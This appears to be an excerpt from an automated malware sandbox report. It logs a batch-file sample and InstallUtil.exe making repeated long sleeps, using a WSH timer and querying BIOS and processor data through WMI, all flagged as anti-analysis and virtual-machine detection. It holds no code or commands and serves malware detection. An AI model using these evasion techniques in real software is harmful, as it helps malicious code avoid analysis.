Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2710000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: D20000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799964
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 1799610

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Window / User API: threadDelayed 2652	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Window / User API: threadDelayed 2293	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6631	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Window / User API: threadDelayed 4361	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Window / User API: threadDelayed 1359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6803

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 4508	Thread sleep count: 2652 > 30	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 6212	Thread sleep count: 2293 > 30	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe TID: 5588	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1456	Thread sleep count: 6631 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1456	Thread sleep count: 3204 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99778s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99670s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -99107s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98995s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98541s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98379s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98206s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -98090s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97970s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97733s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97280s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -97047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96594s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -96047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95827s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95715s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -95015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -94031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5160	Thread sleep time: -93578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 4232	Thread sleep count: 4361 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 4232	Thread sleep count: 1359 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe TID: 5016	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6784	Thread sleep count: 3024 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99874s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99764s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6784	Thread sleep count: 6803 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99611s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -99047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98827s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98280s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98169s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -98062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97844s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97500s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97383s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -97045s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96608s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96492s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96389s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96171s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -96062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95825s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95605s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95155s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -95047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -94937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -94819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799964s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4560	Thread sleep time: -1799610s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99107	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98541	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98206	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98090	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97970	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97733	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 96047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95715	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 95015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 94031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 93578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99265
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 99047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98937
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98827
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98719
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 98062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 97844
